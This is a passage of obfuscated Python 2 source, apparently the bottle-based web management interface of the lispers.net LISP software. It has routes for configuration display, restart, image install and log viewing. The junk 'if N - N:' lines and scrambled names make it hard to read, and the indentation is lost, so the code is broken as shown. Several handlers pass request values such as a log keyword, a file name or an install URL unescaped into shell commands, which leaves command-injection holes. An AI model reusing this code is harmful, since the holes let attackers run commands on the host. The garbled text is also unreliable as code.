if 58 - 58: I1IiiI + i11iIiiIii % Ii1I . OoOoOO00
if 13 - 13: i11iIiiIii + i1IIi * iIii1I11I1II1 % OoooooooOO - II111iiii * OOooOOo
if 26 - 26: OoooooooOO * I1IiiI + OOooOOo
o00 = ""
I1111i = lispconfig . lisp_is_user_superuser ( None )
if ( I1111i ) :
IiIii1i111 = lisp . lisp_button ( "show configuration" , "/lisp/show/conf" )
iI = lisp . lisp_button ( "show configuration diff" , "/lisp/show/diff" )
o0o00 = lisp . lisp_button ( "archive configuration" , "/lisp/archive/conf" )
IIi = lisp . lisp_button ( "clear configuration" , "/lisp/clear/conf/verify" )
o0o0O = lisp . lisp_button ( "log flows" , "/lisp/log/flows" )
oOoO00oo0O = lisp . lisp_button ( "install LISP software" , "/lisp/install/image" )
IiiiI = lisp . lisp_button ( "restart LISP subsystem" , "/lisp/restart/verify" )
if 61 - 61: OOooOOo % OOooOOo * o0oOOo0O0Ooo / o0oOOo0O0Ooo
o00 = "<center>{}{}{}{}{}{}{}</center><hr>" . format ( IiIii1i111 , iI , o0o00 , IIi ,
o0o0O , oOoO00oo0O , IiiiI )
if 75 - 75: IiII . ooOoO0o
if 50 - 50: OoOoOO00
O00o0OO0000oo = commands . getoutput ( "uptime" )
i1OO0oOOoo = commands . getoutput ( "uname -pv" )
oOOO00o000o = lisp . lisp_version . replace ( "+" , "" )
if 9 - 9: oO0o + I11i / I11i
if 12 - 12: OoooooooOO % o0oOOo0O0Ooo * I11i % iIii1I11I1II1 / Ii1I
if 27 - 27: i11iIiiIii % II111iiii % I11i . O0 - Oo0Ooo + OoOoOO00
if 57 - 57: iIii1I11I1II1 / I11i - i1IIi
if 51 - 51: IiII
ii11I1 = multiprocessing . cpu_count ( )
if 75 - 75: OoO0O00 / II111iiii % O0
Ii111iIi1iIi = O00o0OO0000oo . find ( ", load" )
O00o0OO0000oo = O00o0OO0000oo [ 0 : Ii111iIi1iIi ]
IIIII = lisp . lisp_print_elapsed ( lisp . lisp_uptime )
if 78 - 78: Ii1I * i1IIi
iI11 = "Not available"
if 96 - 96: OOooOOo
if 85 - 85: o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . O0 % I1Ii111
if 90 - 90: Oo0Ooo % O0 * iIii1I11I1II1 . iII111i
if 8 - 8: ooOoO0o + II111iiii / iII111i / I11i
Oo0O0 = "ps auww" if lisp . lisp_is_macos ( ) else "ps aux"
ooo0O = commands . getoutput ( "{} | egrep 'PID|python lisp|python -O lisp' | egrep -v grep" . format ( Oo0O0 ) )
if 16 - 16: OoOoOO00
if 41 - 41: i1IIi * II111iiii / OoooooooOO . OOooOOo
ooo0O = ooo0O . replace ( " " , lisp . space ( 1 ) )
ooo0O = ooo0O . replace ( "\n" , "<br>" )
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
if 46 - 46: OoOoOO00 / iIii1I11I1II1 % iII111i . iIii1I11I1II1 * iII111i
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
if ( i1OO0oOOoo . find ( "Darwin" ) != - 1 ) :
ii11I1 = ii11I1 / 2
iI11 = commands . getoutput ( "top -l 1 | head -50" )
iI11 = iI11 . split ( "PID" )
iI11 = iI11 [ 0 ]
if 45 - 45: I1Ii111
if 83 - 83: OoOoOO00 . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
Ii111iIi1iIi = iI11 . find ( "Load Avg" )
O000OOO0OOo = iI11 [ 0 : Ii111iIi1iIi ] . find ( "threads" )
i1i1I111iIi1 = iI11 [ 0 : O000OOO0OOo + 7 ]
iI11 = i1i1I111iIi1 + "<br>" + iI11 [ Ii111iIi1iIi : : ]
Ii111iIi1iIi = iI11 . find ( "CPU usage" )
iI11 = iI11 [ 0 : Ii111iIi1iIi ] + "<br>" + iI11 [ Ii111iIi1iIi : : ]
Ii111iIi1iIi = iI11 . find ( "SharedLibs:" )
iI11 = iI11 [ 0 : Ii111iIi1iIi ] + "<br>" + iI11 [ Ii111iIi1iIi : : ]
Ii111iIi1iIi = iI11 . find ( "MemRegions" )
iI11 = iI11 [ 0 : Ii111iIi1iIi ] + "<br>" + iI11 [ Ii111iIi1iIi : : ]
Ii111iIi1iIi = iI11 . find ( "PhysMem" )
iI11 = iI11 [ 0 : Ii111iIi1iIi ] + "<br>" + iI11 [ Ii111iIi1iIi : : ]
Ii111iIi1iIi = iI11 . find ( "VM:" )
iI11 = iI11 [ 0 : Ii111iIi1iIi ] + "<br>" + iI11 [ Ii111iIi1iIi : : ]
Ii111iIi1iIi = iI11 . find ( "Networks" )
iI11 = iI11 [ 0 : Ii111iIi1iIi ] + "<br>" + iI11 [ Ii111iIi1iIi : : ]
Ii111iIi1iIi = iI11 . find ( "Disks" )
iI11 = iI11 [ 0 : Ii111iIi1iIi ] + "<br>" + iI11 [ Ii111iIi1iIi : : ]
else :
if 92 - 92: ooOoO0o
if 22 - 22: Oo0Ooo % iII111i * I1ii11iIi11i / OOooOOo % i11iIiiIii * I11i
if 95 - 95: OoooooooOO - IiII * I1IiiI + OoOoOO00
if 10 - 10: o0oOOo0O0Ooo / i11iIiiIii
iiiiI = commands . getoutput ( "top -b -n 1 | head -50" )
iiiiI = iiiiI . split ( "PID" )
iiiiI [ 1 ] = iiiiI [ 1 ] . replace ( " " , lisp . space ( 1 ) )
iiiiI = iiiiI [ 0 ] + iiiiI [ 1 ]
iI11 = iiiiI . replace ( "\n" , "<br>" )
if 92 - 92: I11i . I1Ii111
if 85 - 85: I1ii11iIi11i . I1Ii111
O0O0Ooooo000 = commands . getoutput ( "cat release-notes.txt" )
O0O0Ooooo000 = O0O0Ooooo000 . replace ( "\n" , "<br>" )
if 65 - 65: OOooOOo * I1Ii111
o00 += '''
<br><table align="center" border="1" cellspacing="3x" cellpadding="5x">
<tr>
<td width="20%"><i>LISP Subsystem Version:<br>
LISP Release {} Build Date:</i></td>
<td width="80%"><font face="Courier New">{}<br>
{}</font></td>
</tr>
<tr>
<td width="20%"><i>LISP Subsystem Uptime:<br>System Uptime:</i></td>
<td width="80%"><font face="Courier New">{}<br>
{}</font></td>
</tr>
<tr>
<td width="20%"><i>System Architecture:<br>
Number of CPUs:<font face="Courier New">{}{}</font></td>
<td width="80%"><font face="Courier New">{}</font></td>
</tr>
<tr>
<td width="20%" valign="top"><i>LISP Process Status:</i></td>
<td width="80%">
<div style="height: 100px; overflow: auto">
<font size="2" face="Courier New">{}</font></div></td>
</tr>
<tr>
<td width="20%" valign="top"><i>System Resource Utilization:</i></td>
<td width="80%">
<div style="height: 200px; overflow: auto">
<font face="Courier New">{}</font></td>
</tr>
<tr>
<td width="20%" valign="top"><i>Release Notes:</i></td>
<td width="80%">
<div style="height: 300px; overflow: auto">
<font size="2" face="Courier New">{}</font></div></td>
</tr>
</table>
''' . format ( oOOO00o000o , lisp . lisp_version , Oo0oO0ooo , IIIII ,
O00o0OO0000oo , lisp . lisp_space ( 1 ) , ii11I1 , i1OO0oOOoo , ooo0O , iI11 ,
O0O0Ooooo000 )
if 79 - 79: OoooooooOO - I1IiiI
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 69 - 69: I11i
if 95 - 95: ooOoO0o + i11iIiiIii * I1Ii111 - i1IIi * I1Ii111 - iIii1I11I1II1
if 75 - 75: OoooooooOO * IiII
if 9 - 9: IiII - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
if 39 - 39: IiII * Oo0Ooo + iIii1I11I1II1 - IiII + OOooOOo
if 69 - 69: O0
if 85 - 85: ooOoO0o / O0
@ bottle . route ( '/lisp/show/conf' )
def iI1iIIIi1i ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 89 - 89: iIii1I11I1II1
return ( bottle . static_file ( "lisp.config" , root = "./" , mimetype = "text/plain" ) )
if 21 - 21: I11i % I11i
if 27 - 27: i11iIiiIii / I1ii11iIi11i
if 84 - 84: Oo0Ooo
if 43 - 43: oO0o - OoooooooOO
if 3 - 3: O0 / iII111i
if 31 - 31: OOooOOo + o0oOOo0O0Ooo . OoooooooOO
if 89 - 89: II111iiii + i1IIi + II111iiii
@ bottle . route ( '/lisp/show/diff' )
def IiII1II11I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 54 - 54: IiII + O0 + I11i * I1Ii111 - OOooOOo % oO0o
return ( bottle . static_file ( "lisp.config.diff" , root = "./" ,
mimetype = "text/plain" ) )
if 13 - 13: ooOoO0o / iII111i * OoO0O00 . OoO0O00 * ooOoO0o
if 63 - 63: I1Ii111 / O0 * Oo0Ooo + II111iiii / IiII + Ii1I
if 63 - 63: OoO0O00 + I1ii11iIi11i . I1Ii111 % I1Ii111
if 57 - 57: II111iiii
if 54 - 54: Oo0Ooo + oO0o + i11iIiiIii
if 28 - 28: oO0o
if 70 - 70: IiII
@ bottle . route ( '/lisp/archive/conf' )
def i11i1iiI1i ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 87 - 87: ooOoO0o
if 45 - 45: OoO0O00 / OoooooooOO - iII111i / Ii1I % IiII
lisp . lisp_ipc_lock . acquire ( )
os . system ( "cp ./lisp.config ./lisp.config.archive" )
lisp . lisp_ipc_lock . release ( )
if 83 - 83: I1IiiI . iIii1I11I1II1 - IiII * i11iIiiIii
o00 = "Configuration file saved to "
o00 = lisp . lisp_print_sans ( o00 )
o00 += lisp . lisp_print_cour ( "./lisp.config.archive" )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 20 - 20: i1IIi * I1Ii111 + II111iiii % o0oOOo0O0Ooo % oO0o
if 13 - 13: Oo0Ooo
if 60 - 60: I1ii11iIi11i * I1IiiI
if 17 - 17: OOooOOo % Oo0Ooo / I1ii11iIi11i . IiII * OOooOOo - II111iiii
if 41 - 41: Ii1I
if 77 - 77: I1Ii111
if 65 - 65: II111iiii . I1IiiI % oO0o * OoO0O00
@ bottle . route ( '/lisp/clear/conf' )
def iI11I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 11 - 11: iII111i - oO0o + II111iiii - iIii1I11I1II1
if 7 - 7: IiII - I11i / II111iiii * Ii1I . iII111i * iII111i
os . system ( "cp ./lisp.config ./lisp.config.before-clear" )
lisp . lisp_ipc_lock . acquire ( )
O0O0oOOo0O ( )
lisp . lisp_ipc_lock . release ( )
if 19 - 19: o0oOOo0O0Ooo / I1Ii111 % o0oOOo0O0Ooo % iII111i * IiII
o00 = "Configuration cleared, a backup copy is stored in "
o00 = lisp . lisp_print_sans ( o00 )
o00 += lisp . lisp_print_cour ( "./lisp.config.before-clear" )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 19 - 19: iIii1I11I1II1
if 26 - 26: OoooooooOO % I1IiiI % Oo0Ooo . I1IiiI % Ii1I
if 34 - 34: IiII / OoOoOO00
if 87 - 87: O0 * o0oOOo0O0Ooo * Oo0Ooo * II111iiii
if 6 - 6: i1IIi . I1ii11iIi11i + OoOoOO00 * I11i / OoOoOO00 % oO0o
if 18 - 18: II111iiii . OoooooooOO % OoOoOO00 % Ii1I
if 9 - 9: OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
@ bottle . route ( '/lisp/clear/conf/verify' )
def ii1Ii1IiIIi ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 83 - 83: I11i / I1ii11iIi11i
if 34 - 34: I1IiiI * Oo0Ooo * I1Ii111 / OoO0O00 * I11i / iIii1I11I1II1
o00 = "<br>Are you sure you want to clear the configuration?"
o00 = lisp . lisp_print_sans ( o00 )
if 74 - 74: Oo0Ooo / i11iIiiIii - II111iiii * o0oOOo0O0Ooo
IIi1IIIIi = lisp . lisp_button ( "yes" , "/lisp/clear/conf" )
OOOoO = lisp . lisp_button ( "cancel" , "/lisp" )
o00 += IIi1IIIIi + OOOoO + "<br>"
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 14 - 14: I11i . iIii1I11I1II1 . OoooooooOO . II111iiii / o0oOOo0O0Ooo
if 21 - 21: i11iIiiIii / i1IIi + I1IiiI * OOooOOo . I1Ii111
if 84 - 84: O0 . I11i - II111iiii . ooOoO0o / II111iiii
if 47 - 47: OoooooooOO
if 4 - 4: I1IiiI % I11i
if 10 - 10: IiII . OoooooooOO - OoO0O00 + IiII - O0
if 82 - 82: ooOoO0o + II111iiii
if 39 - 39: oO0o % iIii1I11I1II1 % O0 % OoooooooOO * I1ii11iIi11i + iII111i
if 68 - 68: Oo0Ooo + i11iIiiIii
def Oo0oOooo000OO ( ) :
o0o = ""
if 98 - 98: o0oOOo0O0Ooo + O0 % i1IIi - OOooOOo + Oo0Ooo
for OoOo000oOo0oo in [ "443" , "-8080" , "8080" ] :
oO0O = 'ps auxww | egrep "lisp-core.pyo {}" | egrep -v grep' . format ( OoOo000oOo0oo )
o00 = commands . getoutput ( oO0O )
if ( o00 == "" ) : continue
if 86 - 86: OoOoOO00 . iIii1I11I1II1 - OoO0O00
o00 = o00 . split ( "\n" ) [ 0 ]
o00 = o00 . split ( " " )
if ( o00 [ - 2 ] == "lisp-core.pyo" and o00 [ - 1 ] == OoOo000oOo0oo ) : o0o = OoOo000oOo0oo
break
if 56 - 56: O0
return ( o0o )
if 61 - 61: o0oOOo0O0Ooo / OOooOOo / Oo0Ooo * O0
if 23 - 23: oO0o - OOooOOo + I11i
if 12 - 12: I1IiiI / ooOoO0o % o0oOOo0O0Ooo / i11iIiiIii % OoooooooOO
if 15 - 15: iIii1I11I1II1 % OoooooooOO - Oo0Ooo * Ii1I + I11i
if 11 - 11: iII111i * Ii1I - OoOoOO00
if 66 - 66: OoOoOO00 . i11iIiiIii - iII111i * o0oOOo0O0Ooo + OoooooooOO * I1ii11iIi11i
if 74 - 74: Oo0Ooo
@ bottle . route ( '/lisp/restart' )
def OO000o00 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 46 - 46: OoO0O00
if 71 - 71: I11i / I11i * oO0o * oO0o / II111iiii
if 35 - 35: OOooOOo * o0oOOo0O0Ooo * I1IiiI % Oo0Ooo . OoOoOO00
if 58 - 58: I11i + II111iiii * iII111i * i11iIiiIii - iIii1I11I1II1
if 68 - 68: OoooooooOO % II111iiii
if 26 - 26: II111iiii % i11iIiiIii % iIii1I11I1II1 % I11i * I11i * I1ii11iIi11i
OOoO = commands . getoutput ( "egrep requiretty /etc/sudoers" ) . split ( " " )
if ( OOoO [ - 1 ] == "requiretty" and OOoO [ 0 ] == "Defaults" ) :
o00 = "Need to remove 'requiretty' from /etc/sudoers"
o00 = lisp . lisp_print_sans ( o00 )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 24 - 24: II111iiii % I1Ii111 - ooOoO0o + I1IiiI * I1ii11iIi11i
if 2 - 2: Ii1I - IiII
lisp . lprint ( lisp . bold ( "LISP subsystem restart request received" , False ) )
if 83 - 83: oO0o % o0oOOo0O0Ooo % Ii1I - II111iiii * OOooOOo / OoooooooOO
if 18 - 18: OoO0O00 + iIii1I11I1II1 - II111iiii - I1IiiI
if 71 - 71: OoooooooOO
if 33 - 33: I1Ii111
if 62 - 62: I1ii11iIi11i + Ii1I + i1IIi / OoooooooOO
o0o = Oo0oOooo000OO ( )
if 7 - 7: o0oOOo0O0Ooo + i1IIi . I1IiiI / Oo0Ooo
if 22 - 22: ooOoO0o - ooOoO0o % OOooOOo . I1Ii111 + oO0o
if 63 - 63: I1IiiI % I1Ii111 * o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % iII111i
if 45 - 45: IiII
oO0O = "sleep 1; sudo ./RESTART-LISP {}" . format ( o0o )
thread . start_new_thread ( os . system , ( oO0O , ) )
if 20 - 20: OoooooooOO * o0oOOo0O0Ooo * O0 . OOooOOo
o00 = lisp . lisp_print_sans ( "Restarting LISP subsystem ..." )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 78 - 78: iIii1I11I1II1 + I11i - Ii1I * I1Ii111 - OoooooooOO % OoOoOO00
if 34 - 34: O0
if 80 - 80: i1IIi - Oo0Ooo / OoO0O00 - i11iIiiIii
if 68 - 68: oO0o - I1ii11iIi11i % O0 % I1Ii111
if 11 - 11: O0 / OoO0O00 % OOooOOo + o0oOOo0O0Ooo + iIii1I11I1II1
if 40 - 40: ooOoO0o - OOooOOo . Ii1I * Oo0Ooo % I1Ii111
if 56 - 56: i11iIiiIii . o0oOOo0O0Ooo - I1IiiI * I11i
@ bottle . route ( '/lisp/restart/verify' )
def oOOoo0 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 20 - 20: IiII % IiII
if 94 - 94: o0oOOo0O0Ooo + O0 / I11i . I1IiiI + OOooOOo . iIii1I11I1II1
o00 = "<br>Are you sure you want to restart the LISP subsystem?"
o00 = lisp . lisp_print_sans ( o00 )
if 62 - 62: OoOoOO00 / I1IiiI - I1ii11iIi11i - I1IiiI + i11iIiiIii + i1IIi
IIi1IIIIi = lisp . lisp_button ( "yes" , "/lisp/restart" )
OOOoO = lisp . lisp_button ( "cancel" , "/lisp" )
o00 += IIi1IIIIi + OOOoO + "<br>"
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 23 - 23: iII111i + I11i . OoOoOO00 * I1IiiI + I1ii11iIi11i
if 18 - 18: IiII * o0oOOo0O0Ooo . IiII / O0
if 8 - 8: o0oOOo0O0Ooo
if 4 - 4: I1ii11iIi11i + I1ii11iIi11i * ooOoO0o - OoOoOO00
if 78 - 78: Ii1I / II111iiii % OoOoOO00
if 52 - 52: OOooOOo - iII111i * oO0o
if 17 - 17: OoooooooOO + OOooOOo * I11i * OoOoOO00
@ bottle . route ( '/lisp/install' , method = "post" )
def iiIii1I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 47 - 47: ooOoO0o . I11i / o0oOOo0O0Ooo
if 83 - 83: o0oOOo0O0Ooo / OOooOOo / OOooOOo + o0oOOo0O0Ooo * I1Ii111 + o0oOOo0O0Ooo
IIIIiii = bottle . request . forms . get ( "image_url" )
if ( IIIIiii . find ( "lispers.net" ) == - 1 or IIIIiii . find ( ".tgz" ) == - 1 ) :
oO0oIIIii1iiIi = "Invalid install request for file {}" . format ( IIIIiii )
lisp . lprint ( lisp . bold ( oO0oIIIii1iiIi , False ) )
o00 = lisp . lisp_print_sans ( "Invalid lispers.net tarball file name" )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 63 - 63: I1ii11iIi11i
if 6 - 6: ooOoO0o / I1ii11iIi11i
if ( lisp . lisp_is_ubuntu ( ) ) :
oO0O = "python lisp-get-bits.pyo {} force 2>&1 > /dev/null" . format ( IIIIiii )
else :
oO0O = "python lisp-get-bits.pyo {} force >& /dev/null" . format ( IIIIiii )
if 57 - 57: I11i
ooo0O = os . system ( oO0O )
if 67 - 67: OoO0O00 . ooOoO0o
oO00oOo0OOO = IIIIiii . split ( "/" ) [ - 1 ]
if 23 - 23: i1IIi . o0oOOo0O0Ooo * OoO0O00
if ( os . path . exists ( oO00oOo0OOO ) ) :
iIi1IiI = IIIIiii . split ( "release-" ) [ 1 ]
iIi1IiI = iIi1IiI . split ( ".tgz" ) [ 0 ]
if 14 - 14: IiII % oO0o % Oo0Ooo - i11iIiiIii
o00 = "Install completed for release {}" . format ( iIi1IiI )
o00 = lisp . lisp_print_sans ( o00 )
if 53 - 53: Ii1I % Oo0Ooo
o00 += "<br><br>" + lisp . lisp_button ( "restart LISP subsystem" ,
"/lisp/restart/verify" ) + "<br>"
else :
oO0oIIIii1iiIi = lisp . lisp_print_cour ( IIIIiii )
o00 = "Install failed for file {}" . format ( oO0oIIIii1iiIi )
o00 = lisp . lisp_print_sans ( o00 )
if 59 - 59: OOooOOo % iIii1I11I1II1 . i1IIi + II111iiii * IiII
if 41 - 41: Ii1I % I1ii11iIi11i
oO0oIIIii1iiIi = "Install request for file {} {}" . format ( IIIIiii ,
"succeeded" if ( ooo0O == 0 ) else "failed" )
lisp . lprint ( lisp . bold ( oO0oIIIii1iiIi , False ) )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 12 - 12: OOooOOo
if 69 - 69: OoooooooOO + OOooOOo
if 26 - 26: Oo0Ooo + OOooOOo / OoO0O00 % OoOoOO00 % I1ii11iIi11i + II111iiii
if 31 - 31: I11i % OOooOOo * I11i
if 45 - 45: i1IIi . I1IiiI + OOooOOo - OoooooooOO % ooOoO0o
if 1 - 1: iIii1I11I1II1
if 93 - 93: i1IIi . i11iIiiIii . Oo0Ooo
@ bottle . route ( '/lisp/install/image' )
def O0O00OOo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 66 - 66: i11iIiiIii / o0oOOo0O0Ooo - OoooooooOO / i1IIi . i11iIiiIii
if 16 - 16: Oo0Ooo % I1ii11iIi11i + I11i - O0 . iII111i / I1Ii111
oO0oIIIii1iiIi = lisp . lisp_print_sans ( "<br>Enter lispers.net tarball URL:" )
o00 = '''
<form action="/lisp/install" method="post" style="display: inline;">
{}
<input type="text" name="image_url" size="75" required/>
<input type="submit" style="background-color:transparent;border-radius:10px;" value="Submit" />
</form><br>''' . format ( oO0oIIIii1iiIi )
if 35 - 35: oO0o / I1Ii111 / II111iiii - iIii1I11I1II1 + II111iiii . I1Ii111
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 81 - 81: iII111i * OOooOOo - I1ii11iIi11i * Ii1I % OoOoOO00 * OoOoOO00
if 59 - 59: iIii1I11I1II1
if 7 - 7: OOooOOo * I1IiiI / o0oOOo0O0Ooo * i11iIiiIii
if 84 - 84: OOooOOo . iII111i
if 8 - 8: Oo0Ooo + II111iiii * OOooOOo * OoOoOO00 * I11i / IiII
if 21 - 21: oO0o / OoooooooOO
if 11 - 11: OOooOOo % Ii1I - i11iIiiIii - oO0o + ooOoO0o + IiII
if 87 - 87: I1Ii111 * i1IIi / I1ii11iIi11i
@ bottle . route ( '/lisp/log/flows' )
def IIII1i1 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 70 - 70: i11iIiiIii % I1ii11iIi11i / I1IiiI
if 62 - 62: i1IIi - OoOoOO00
os . system ( "touch ./log-flows" )
if 62 - 62: i1IIi + Oo0Ooo % IiII
o00 = lisp . lisp_print_sans ( "Flow data appended to file " )
iIi = "<a href='/lisp/show/log/lisp-flow/100'>logs/lisp-flows.log</a>"
o00 += lisp . lisp_print_cour ( iIi )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 10 - 10: OoO0O00 / Oo0Ooo
if 15 - 15: iII111i . OoOoOO00 / iII111i * I11i - I1IiiI % I1ii11iIi11i
if 57 - 57: O0 % OoOoOO00 % oO0o
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
if 39 - 39: iIii1I11I1II1 - OoooooooOO
if 81 - 81: I1ii11iIi11i - O0 * OoooooooOO
if 23 - 23: II111iiii / oO0o
@ bottle . route ( '/lisp/search/log/<name>/<num>/<keyword>' )
def iII1Iii1I11i ( name = "" , num = "" , keyword = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
Oo0O0 = "tail -n {} logs/{}.log | egrep -B10 -A10 {}" . format ( num , name ,
keyword )
o00 = commands . getoutput ( Oo0O0 )
if ( o00 ) :
IIo0OoO00 = o00 . count ( keyword )
o00 = lisp . convert_font ( o00 )
o00 = o00 . replace ( "--\n--\n" , "--\n" )
o00 = o00 . replace ( "\n" , "<br>" )
o00 = o00 . replace ( "--<br>" , "<hr>" )
o00 = "Found <b>{}</b> occurrences<hr>" . format ( IIo0OoO00 ) + o00
else :
o00 = "Keyword {} not found" . format ( keyword )
iIi11ii = "<font color='blue'><b>{}</b></font>" . format ( keyword )
o00 = o00 . replace ( keyword , iIi11ii )
o00 = lisp . lisp_print_cour ( o00 )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
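# POST handler for the keyword-search form; delegates to the GET search
# handler above.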
@ bottle . post ( '/lisp/search/log/<name>/<num>' )
def o00oo0000 ( name = "" , num = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
I11Ii = bottle . request . forms . get ( "keyword" )
return ( iII1Iii1I11i ( name , num , I11Ii ) )
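# /lisp/show/log/<name>/<num>: render the last <num> lines (default 100) of
# logs/<name>.log, preceded by a keyword-search form.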
@ bottle . route ( '/lisp/show/log/<name>/<num>' )
def i1i1IiIiIi1Ii ( name = "" , num = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if ( num == "" ) : num = 100
ooO0000o00O = '''
<form action="/lisp/search/log/{}/{}" method="post">
<i>Keyword search:</i>
<input type="text" name="keyword" />
<input style="background-color:transparent;border-radius:10px;" type="submit" value="Submit" />
</form><hr>
''' . format ( name , num )
if ( os . path . exists ( "logs/{}.log" . format ( name ) ) ) :
o00 = commands . getoutput ( "tail -n {} logs/{}.log" . format ( num , name ) )
o00 = lisp . convert_font ( o00 )
o00 = o00 . replace ( "\n" , "<br>" )
o00 = ooO0000o00O + lisp . lisp_print_cour ( o00 )
else :
o0oOOo0OooOo = lisp . lisp_print_sans ( "File" )
o0 = lisp . lisp_print_cour ( "logs/{}.log" . format ( name ) )
iIiiIiiIi = lisp . lisp_print_sans ( "does not exist" )
o00 = "{} {} {}" . format ( o0oOOo0OooOo , o0 , iIiiIiiIi )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
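# /lisp/debug/<name>: change debug settings through the configuration API.
# <name> is "<setting>%<value>", or "disable%all" to turn off every knob in
# the "lisp debug" clause and the logging knobs in "lisp xtr-parameters".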
@ bottle . route ( '/lisp/debug/<name>' )
def oo0O ( name = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if ( name == "disable%all" ) :
O000oo = lispconfig . lisp_get_clause_for_api ( "lisp debug" )
if ( O000oo [ 0 ] . has_key ( "lisp debug" ) ) :
i1 = [ ]
for OO0 in O000oo [ 0 ] [ "lisp debug" ] :
Ooo0 = OO0 . keys ( ) [ 0 ]
i1 . append ( { Ooo0 : "no" } )
i1 = { "lisp debug" : i1 }
lispconfig . lisp_put_clause_for_api ( i1 )
O000oo = lispconfig . lisp_get_clause_for_api ( "lisp xtr-parameters" )
if ( O000oo [ 0 ] . has_key ( "lisp xtr-parameters" ) ) :
i1 = [ ]
for OO0 in O000oo [ 0 ] [ "lisp xtr-parameters" ] :
Ooo0 = OO0 . keys ( ) [ 0 ]
if ( Ooo0 in [ "data-plane-logging" , "flow-logging" ] ) :
i1 . append ( { Ooo0 : "no" } )
else :
i1 . append ( { Ooo0 : OO0 [ Ooo0 ] } )
i1 = { "lisp xtr-parameters" : i1 }
lispconfig . lisp_put_clause_for_api ( i1 )
return ( lispconfig . lisp_landing_page ( ) )
name = name . split ( "%" )
Oo = name [ 0 ]
OooOooo = name [ 1 ]
oo0O0o00 = [ "data-plane-logging" , "flow-logging" ]
i1iIi1111 = "lisp xtr-parameters" if ( Oo in oo0O0o00 ) else "lisp debug"
O000oo = lispconfig . lisp_get_clause_for_api ( i1iIi1111 )
if ( O000oo [ 0 ] . has_key ( i1iIi1111 ) ) :
i1 = { }
for OO0 in O000oo [ 0 ] [ i1iIi1111 ] :
i1 [ OO0 . keys ( ) [ 0 ] ] = OO0 . values ( ) [ 0 ]
if ( i1 . has_key ( Oo ) ) : i1 [ Oo ] = OooOooo
i1 = { i1iIi1111 : i1 }
lispconfig . lisp_put_clause_for_api ( i1 )
return ( lispconfig . lisp_landing_page ( ) )
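# /lisp/clear/...: send a "clear" IPC command to the selected component
# process (map-cache, referral-cache, or per-site decapsulation stats).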
@ bottle . route ( '/lisp/clear/<name>' )
@ bottle . route ( '/lisp/clear/etr/<etr_name>/<stats_name>' )
@ bottle . route ( '/lisp/clear/rtr/<rtr_name>/<stats_name>' )
@ bottle . route ( '/lisp/clear/itr/<itr_name>' )
@ bottle . route ( '/lisp/clear/rtr/<rtr_name>' )
def OOoO00ooO ( name = "" , itr_name = '' , rtr_name = "" , etr_name = "" ,
stats_name = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if ( lispconfig . lisp_is_user_superuser ( None ) == False ) :
o00 = lisp . lisp_print_sans ( "Not authorized" )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
i11I1iIiII = "clear"
if ( name == "referral" ) :
i11IiIIi11I = "lisp-mr"
o000o0O0Oo00 = "Referral"
elif ( itr_name == "map-cache" ) :
i11IiIIi11I = "lisp-itr"
o000o0O0Oo00 = "ITR <a href='/lisp/show/itr/map-cache'>map-cache</a>"
elif ( rtr_name == "map-cache" ) :
i11IiIIi11I = "lisp-rtr"
o000o0O0Oo00 = "RTR <a href='/lisp/show/rtr/map-cache'>map-cache</a>"
elif ( etr_name == "stats" ) :
i11IiIIi11I = "lisp-etr"
o000o0O0Oo00 = ( "ETR '{}' decapsulation <a href='/lisp/show/" + "database'>stats</a>" ) . format ( stats_name )
i11I1iIiII += "%" + stats_name
elif ( rtr_name == "stats" ) :
i11IiIIi11I = "lisp-rtr"
o000o0O0Oo00 = ( "RTR '{}' decapsulation <a href='/lisp/show/" + "rtr/map-cache'>stats</a>" ) . format ( stats_name )
i11I1iIiII += "%" + stats_name
else :
